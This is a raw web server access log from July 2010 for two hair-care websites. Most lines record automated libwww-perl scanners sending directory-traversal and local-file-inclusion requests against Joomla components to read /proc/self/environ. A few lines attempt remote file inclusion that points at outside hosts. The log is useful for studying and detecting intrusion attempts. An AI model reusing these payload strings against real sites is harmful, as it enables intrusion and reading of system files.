67.201.60.20 - - [12/Jul/2010:19:04:14 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
129.97.219.71 - - [12/Jul/2010:19:04:21 -0700] "HEAD /logs/scripts.log HTTP/1.0" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:04:35 -0700] "GET /logs/access_100628.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:04:35 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:04:36 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:04:38 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
112.105.117.85 - - [12/Jul/2010:19:05:08 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 917504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:05:30 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:05:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:05:30 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:05:55 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:05:55 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:05:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:06:18 -0700] "GET /logs/access_100628.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:06:35 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:06:35 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:06:35 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:09:53 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:10:14 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:10:25 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:10:25 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:10:25 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:10:43 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:10:43 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:10:43 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:10:50 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:10:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:10:50 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:11:20 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:11:21 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:11:21 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:11:22 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:11:22 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:11:22 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:11:25 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:11:26 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:11:34 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
81.93.240.134 - - [12/Jul/2010:19:11:49 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:11:49 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:11:49 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:12:44 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:12:44 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:12:44 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:14:07 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
67.201.60.20 - - [12/Jul/2010:19:14:39 -0700] "GET /logs/access_100419.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:14:39 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:14:42 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:14:51 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:14:54 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:02 -0700] "GET /logs/access_100419.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:02 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:02 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:15:10 -0700] "GET /logs/access_100419.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:15:11 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:15:11 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:11 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:15:13 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
112.105.117.85 - - [12/Jul/2010:19:15:14 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 983040 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.freehairsecrets.com"
174.121.191.5 - - [12/Jul/2010:19:15:18 -0700] "GET /logs/access_100419.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:18 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.191.5 - - [12/Jul/2010:19:15:18 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13763 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12869 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:24 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15781 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=16913 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17215 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:27 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2121 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6085 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=7727 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:29 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8192 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
208.115.111.248 - - [12/Jul/2010:19:15:30 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9432 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:16:10 -0700] "GET /logs/access_100419.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:16:10 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:16:10 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:17:01 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:17:29 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:49 -0700] "GET /logs/access_100308.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:49 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:49 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:51 -0700] "GET /logs/access_100426.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:51 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:19:51 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:21:10 -0700] "GET /logs/access_100308.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:21:10 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:21:10 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:22:13 -0700] "GET /logs/access_100426.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:22:14 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.93.240.134 - - [12/Jul/2010:19:22:14 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:22:20 -0700] "GET /logs/access_100426.log/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:22:20 -0700] "GET /index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
67.201.60.20 - - [12/Jul/2010:19:22:20 -0700] "GET /logs/index.php?option=com_sef&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
81.21.78.22 - - [12/Jul/2010:19:24:19 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://chileenduro.cl/home/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:25:01 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:25:01 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:25:01 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.9.231.100 - - [12/Jul/2010:19:25:10 -0700] "GET /logs/access_100628.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:25:10 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:25:10 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:25:49 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
64.207.204.37 - - [12/Jul/2010:19:27:01 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.newyorksoulmates.com/readme.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:27:08 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:27:08 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:27:08 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
209.9.231.100 - - [12/Jul/2010:19:28:38 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
